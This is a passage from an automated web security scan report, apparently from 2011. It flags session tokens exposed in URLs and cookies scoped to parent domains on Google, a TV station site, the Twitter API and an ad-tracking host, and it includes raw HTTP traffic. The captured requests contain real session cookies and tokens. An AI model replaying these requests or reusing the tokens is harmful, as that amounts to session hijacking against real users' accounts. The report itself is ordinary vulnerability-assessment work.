GET /accounts/Captcha?ctoken=ecOWC89KIyylmDv-PSxGhtgRFB59uJBi-gg9_wef1O7A3iNHXjWzdFV9AqlKTWXgEXEDOzze2sWjo8VH38xGHw%3AzTcajSXRS-JjUUHMjFOUQA HTTP/1.1
Host: www.google.com
Connection: keep-alive
Referer: https://www.google.com/accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 2930
Date: Sat, 09 Apr 2011 00:21:09 GMT
Expires: Sat, 09 Apr 2011 00:21:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

...[SNIP]...

4.4. https://www.google.com/accounts/NewAccount

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.google.com
Path:   /accounts/NewAccount

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /accounts/NewAccount?continue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&hl=en&service=websiteoptimizer HTTP/1.1
Host: www.google.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173272373.1323948636.1302308457.1302308457.1302308457.1; __utmb=173272373.1.10.1302308457; __utmc=173272373; __utmz=173272373.1302308457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); GALX=Zc_kKjCxArA; GoogleAccountsLocale_session=en; PREF=ID=e01b203a99971f0c:U=d212295d0f1573ee:FF=0:TM=1301786785:LM=1301836821:S=AJ4YE05fu5cLNNZE; NID=45=2n0e1W5_MaAh41CXKSdoaXqu35vMbjiifVyRtn1DMBwVJbE13IvcMlZIDijsF8MaTOfxdNQyHiFXdBnEPtokSQyvX00Wk2NFdxWix3dMOgE1UIQOzRT2_vJoVC6naACD

Response

HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en; Secure
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Date: Sat, 09 Apr 2011 00:21:06 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 71211

<html><head><title>Google Accounts</title>
<style type="text/css">
body {font-family: arial,sans-serif;}
.body {margin: 0 15px; }

div.errorbox-good {}

div.errorbox-bad {}


...[SNIP]...
<div><img src="https://www.google.com/accounts/Captcha?ctoken=I-sHbDZbzZOycbhqbEy98l41TaMDrVw5gCcE4cfQNTOblKxx6MAFyhfUElK9PMLrk8dDOmi1iNr1qO-oS0lurg%3APQb2M-RWN9gEcfoqN7XOLw" width="200" height="70" alt="Visual verification"></div>
...[SNIP]...
<noscript><a href="https://www.google.com/accounts/Captcha?ctoken=LeWT_hBm_6MxaFBX7MrLgTxjcJ5K3ehKU1A8c5PMkK8fubjtpjcq2fbHnJBJNQiJd9g4kFAvFJC1gtNiBWIk1A%3ANYr2uhZOPE9XSQr3g6x-XA" target="_blank"><img src="https://www.google.com/accounts/accessibility.gif" border="0" style="width: 1em; height: 1.2em;" align="absmiddle" alt="Listen and type the numbers you hear">
...[SNIP]...

4.5. http://www.wptz.com/index.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.wptz.com
Path:   /index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.html HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
Vary: Accept-Encoding
X-IBS-CCDS-ORIGIN: origin126
X-Flow: xslt-in-production
Cache-Control: max-age=324
Expires: Sat, 09 Apr 2011 12:35:07 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Content-Length: 154822

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/
...[SNIP]...
<div class="sectionwidget2">


<script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=216931&apiToken=291A707AAEE04CCC9A00B3B498001025" type="text/javascript"></script>
...[SNIP]...

5. Cookie scoped to parent domain
There are 155 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


5.1. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352244311=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352251-30597-14967
X-RateLimit-Limit: 150
ETag: "350bcab9704451c63ab3f21f69a9eb28"-gzip
Last-Modified: Sat, 09 Apr 2011 12:30:51 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02792
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCBJPjovAToHaWQiJTdhYWFkN2QzZGMzMzVk%250ANGIwNGFjZjllZjhmZTA2YTQ5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e2f772c7bb1d7130fafe5220eaad1a5066753ead; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 37156

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56489775208730624","text":"Spring is here to stay! Chance for a few showers late Sunday, then 70s on Monday. Have a great weeke
...[SNIP]...

5.2. http://api.twitter.com/1/WCAX_Dan%20/lists/wcaxnews/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_Dan%20/lists/wcaxnews/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/WCAX_Dan%20/lists/wcaxnews/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352449219=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en; original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWI5%250AZDY2MTEyNzEzYzI5MWVkOGM5ZDNiMDU4OWUxNGM0--68456826b804732decc9adcd874144bfe8409462

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352456-97362-51984
X-RateLimit-Limit: 150
ETag: "9c56bdc9d348f90ccc8f5b3abd425756"-gzip
Last-Modified: Sat, 09 Apr 2011 12:34:16 GMT
X-RateLimit-Remaining: 60
X-Runtime: 0.03948
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovAToHaWQiJWI5ZDY2MTEyNzEzYzI5%250AMWVkOGM5ZDNiMDU4OWUxNGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3fca1ebd2ebf0edc779f5abbed3918788126099a; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 33728

TWTR.Widget.receiveCallback_1([{"in_reply_to_user_id_str":null,"id_str":"56526851723640833","text":"#vt company goes from roadside stand to multi-million $ biz: http:\/\/www.wcax.com\/global\/story.as
...[SNIP]...

5.3. http://a.rfihub.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&cver=1&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; u="aABnAgfAg==AI89bBrQ==AAABLzpChvs="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; e=cd; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j1=1CAESEPxOsKR978Hu13ThKmL5OJM;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Content-Length: 42
Set-Cookie: t=1302352533150;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: u="aABnAnSVw==AI89bBrQ==AAABLzpClp4=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:33 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:33 GMT


5.4. http://a.rfihub.com/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /cm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?apxuid=8663496762294337265&forward= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: g="aABsHUtkw==A-ac0ldxTL_CNwb|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpChvw="; f="aABnVdpdA==AK1302352529AB1AAABLzpChvo="; s="aAC7sFUPw==AE9479AN1294103956000AAABLzpChvo=AE8438AN1275963655000AAABLzpChvo="; a=c369576644441445519; j=c369576644441445519; o=1-DIhc6MPrMFqM; p=1-DIhc6MPrMFqM; r=1302352529146; u="aABnAskUA==AI89bBrQ==AAABLzpCpLs="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a2=8663496762294337265;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j2=8663496762294337265;Path=/;Domain=.rfihub.com
Set-Cookie: t1=1302352537225;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: u="aABnAunNw==AI89bBrQ==AAABLzpCpoo=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:37 GMT
Set-Cookie: a=c369576644441445519;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: j=c369576644441445519;Path=/;Domain=.rfihub.com
Content-Type: image/gif
Set-Cookie: o=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Set-Cookie: p=1-DIhc6MPrMFqM;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529146;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:37 GMT
Content-Length: 42


5.5. http://a.rfihub.com/sed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aABMFwoTA==A-aAcXzUJ2ZpCiN|9530|84152|361230|12352|824|99188|445|38387|6613AAABLzpCh6o=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: u="aABnActyg==AI89bBrQ==AAABLzpCh6k=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: f="aABnVZ4PA==AK1302352529AB1AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: s="aACqCxNPw==AE9479AN1294103956000AAABLzpCh6g=AE8438AN1275963655000AAABLzpCh6g=";Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: e=cd;Path=/;Domain=.rfihub.com;Expires=Mon, 08-Oct-12 12:35:29 GMT
Set-Cookie: a=c369576644441445542;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: j=c369576644441445542;Path=/;Domain=.rfihub.com
Set-Cookie: o=1-qI823taMvmm8;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Set-Cookie: p=1-qI823taMvmm8;Path=/;Domain=.rfihub.com
Set-Cookie: r=1302352529321;Path=/;Domain=.rfihub.com;Expires=Fri, 04-Apr-31 12:35:29 GMT
Content-Length: 2760

<html><body><span id="__rfi" style="height:0px; width:0px"><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.rocketfuelincOX15601/B4639841.2;sz=300x250;ord=1302352529320;click=h
...[SNIP]...

5.6. http://a.rfihub.com/tk.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /tk.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tk.gif?rb=445&re=12387&aa=9530,84152,12352,361230,824,10261,c0ldxTL_CNwb,http%3A%2F%2Frocketfuelinc.com,492,1249,38387,1279,6613&pa=ppre352525508247&id=&ra=3525276570.8074509229045361&ct=1302352527657 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
